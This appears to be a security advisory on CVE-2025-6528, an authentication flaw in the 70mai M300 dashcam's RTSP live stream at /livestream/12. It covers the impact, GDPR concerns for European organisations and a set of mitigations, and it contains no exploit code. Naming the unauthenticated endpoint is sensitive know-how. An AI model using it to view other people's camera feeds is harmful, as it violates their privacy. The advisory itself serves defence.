CVE-2025-6528 is a medium-severity vulnerability affecting the 70mai M300 dashcam device, specifically versions up to 20250611. The flaw resides in the RTSP (Real Time Streaming Protocol) Live Video Stream Endpoint, particularly in an unknown functionality related to the /livestream/12 path. The vulnerability results in improper authentication, allowing an attacker on the local network to access the live video stream without proper credentials or authorization. This means that an attacker connected to the same local network as the device can potentially intercept or view the live video feed without needing any authentication or user interaction. The vulnerability does not require privileges or user interaction and has a low complexity of attack, as indicated by the CVSS vector (AV:A/AC:L/PR:N/UI:N). The vendor 70mai was notified early but has not responded or provided a patch, and while the exploit has been publicly disclosed, there are no known exploits actively used in the wild at this time. The vulnerability impacts confidentiality primarily, as unauthorized access to live video streams can lead to privacy breaches and exposure of sensitive information captured by the dashcam. The integrity and availability of the device are not directly affected by this flaw. Since the attack requires local network access, remote exploitation is not possible without prior network compromise or physical proximity to the network. This vulnerability highlights risks in IoT devices that stream sensitive data without robust authentication mechanisms, especially in environments where local network access is not tightly controlled.

For European organizations, the primary impact of CVE-2025-6528 is the potential exposure of sensitive visual data captured by 70mai M300 dashcams. Organizations using these devices in fleet management, logistics, or security monitoring could face confidentiality breaches if attackers gain unauthorized access to live streams. This could lead to leakage of sensitive operational details, employee movements, or other private information. The vulnerability could also be exploited in insider threat scenarios or by attackers who gain access to corporate Wi-Fi networks. While the vulnerability does not directly affect system integrity or availability, the privacy implications and potential for espionage or surveillance are significant. Additionally, organizations may face regulatory compliance issues under GDPR if personal data is exposed due to inadequate device security. The lack of vendor response and patch availability increases the risk window for affected organizations. However, the requirement for local network access somewhat limits the attack surface, making it less likely to be exploited remotely but still a concern in environments with weak network segmentation or guest network controls.

Implement strict network segmentation to isolate IoT devices like the 70mai M300 dashcam from critical corporate networks and sensitive data systems. Restrict local network access to trusted users and devices only, using strong Wi-Fi encryption (WPA3 where possible) and network access control (NAC) solutions. Monitor local network traffic for unusual RTSP stream requests or unauthorized access attempts to the /livestream/12 endpoint. Disable or restrict RTSP streaming functionality on the device if it is not essential for operations, or replace the device with models that enforce proper authentication. Use VPNs or secure tunnels for remote access to local networks to prevent unauthorized local network access by external attackers. Regularly audit and inventory IoT devices in the environment to identify vulnerable models and plan for timely replacement or mitigation. Engage with the vendor or community for updates or unofficial patches, and consider applying network-level filtering rules to block suspicious RTSP traffic. Educate staff about the risks of connecting unknown devices to corporate networks and enforce policies to prevent unauthorized device usage.